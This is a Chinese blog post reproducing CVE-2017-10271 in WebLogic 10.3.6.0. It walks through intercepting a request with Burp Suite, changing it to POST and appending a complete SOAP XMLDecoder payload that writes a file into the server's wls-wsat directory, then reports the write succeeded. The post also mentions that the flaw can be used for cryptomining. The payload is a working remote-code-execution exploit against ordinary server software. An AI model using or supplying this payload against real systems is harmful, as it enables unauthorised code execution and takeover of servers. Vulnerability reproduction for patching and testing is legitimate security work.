1. 程式人生 > >關於weblogic 10.3.6.0 的漏洞復現(1)

關於weblogic 10.3.6.0 的漏洞復現(1)

iter oid sch AD 成功 str context blog env

最近小R 搭建了個weblogic, 因為之前在公司找系統漏洞的時候,發現了這個漏洞,所以為了特地專門搭建了個10.3.6.0版本。

漏洞編號: CVE-2017-10271

漏洞的描述:就是weblogic 的WLS組件中存在了CVE-2017-10271遠程代碼的執行漏洞,可以構造請求運行weblogic中間件的主機來進行攻擊。此外,還可以利用此漏洞來進行挖礦。

1. 環境就自己去官網搭建吧。 要10.3.6.0這個版本哦

2. 目前發現就是這個頁面存在漏洞。技術分享圖片

3. 通過Burpsuite來抓包,然後修改數據

抓的包是GET請求,註意:需要改為POST,然後在代碼後面加入

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/R.Hacker</string><void method="println">
<string>xmldecoder_vul_test</string></void><void method="close"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

發一下我改的:

技術分享圖片

實驗成功,成功寫入代碼!

技術分享圖片

這只是一個簡單的案例。 後續會陸續更新哈

關於weblogic 10.3.6.0 的漏洞復現(1)